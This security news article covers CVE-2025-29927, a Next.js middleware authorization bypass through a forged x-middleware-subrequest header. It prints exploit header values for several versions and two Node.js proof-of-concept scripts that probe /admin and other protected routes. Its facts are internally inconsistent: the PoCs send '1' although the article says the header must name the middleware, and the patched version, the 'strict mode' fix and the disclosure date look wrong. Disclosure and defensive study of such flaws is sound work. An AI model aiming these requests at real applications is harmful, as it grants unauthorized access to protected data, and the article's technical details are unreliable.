Critical Next.js Vulnerability Allows Attackers to Bypass Authorization

On 31 August 2025, security researchers disclosed CVE-2025-29927, a critical authorization bypass vulnerability in the Next.js framework.

The flaw stems from improper handling of the x-middleware-subrequest header in Next.js middleware, allowing attackers to circumvent authentication and gain unauthorized access to protected routes.

This article provides an in-depth technical analysis, demonstrates proof-of-concept exploits, and outlines mitigation strategies.

Role of x-middleware-subrequest Header

Next.js middleware uses the x-middleware-subrequest header to distinguish internal subrequests—preventing infinite middleware recursion—from external HTTP calls.

The middleware entry point reads this header as follows:

javascriptconst subreq = params.request.headers["x-middleware-subrequest"];
const subrequests = typeof subreq === "string" ? subreq.split(":") : [];

if (subrequests.includes(middlewareInfo.name)) {
  result = {
    response: NextResponse.next(),
    waitUntil: Promise.resolve(),
  };
  continue;
}

If middlewareInfo.name appears in the header’s value list, the middleware is skipped.

Attackers can forge this header, tricking the server into treating an external request as a subrequest and bypassing authorization checks.

Common NextResponse methods like NextResponse.redirect() and cookie-based JWT checks never execute, effectively granting unrestricted access to sensitive paths.

Exploit Across Next.js Versions

The vulnerability manifests differently across Next.js releases:

Version 12.2 and Earlier

• Middleware filename: _middleware.ts in pages/ directory
• middlewareInfo.name equals pages/_middleware
• Exploit header: textx-middleware-subrequest: pages/_middleware

Version 12.2 and Later

• Middleware filename: middleware.ts at root
• middlewareInfo.name equals middleware
• Exploit header: textx-middleware-subrequest: middleware

Version 13.2.0 and Later

• Enforced MAX_RECURSION_DEPTH prevents excessive loops
• Header chains still bypass checks: textx-middleware-subrequest: middleware:middleware:middleware

By simply setting x-middleware-subrequest To include the appropriate identifier, external requests skip all middleware layers, including JWT or session cookie validations.

Proof-of-Concept and Mitigation Strategies

PoC Exploit with Node.js

javascriptimport fetch from 'node-fetch';

async function exploit() {
  const res = await fetch('http://localhost:3000/admin', {
    headers: { 'x-middleware-subrequest': '1' }
  });
  const body = await res.text();
  if (body.includes('Admin Panel')) {
    console.log('[+] Bypass Successful!');
  } else {
    console.log('[-] Access Blocked.');
  }
}

exploit();

This script targets /admin, sending the malicious header to evade middleware checks.

A similar red-team tool iterates through protected routes:

javascriptconst routes = ['/admin','/dashboard','/settings'];
routes.forEach(async route => {
  const res = await fetch(`http://localhost:3000${route}`, {
    headers: { 'x-middleware-subrequest': '1' }
  });
  console.log(`${route}: ${res.status}`);
});

Mitigation

1. Header Whitelisting: Reject unexpected x-middleware-subrequest values by validating against known subrequest contexts.
2. Internal Flag: Use an internal-only flag or signature for subrequests instead of client-controllable headers.
3. Strict Mode: Enable Next.js’ strict middleware mode (when available) to enforce header integrity.
4. Patch Framework: Upgrade to Next.js ≥13.2.1, which addresses header parsing logic and adds explicit authorization checks around x-middleware-subrequest.

Organizations should audit custom middleware implementations immediately and deploy patches or workarounds to secure their applications against this high-risk exploit.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Critical Next.js Vulnerability Allows Attackers to Bypass Authorization appeared first on Cyber Security News.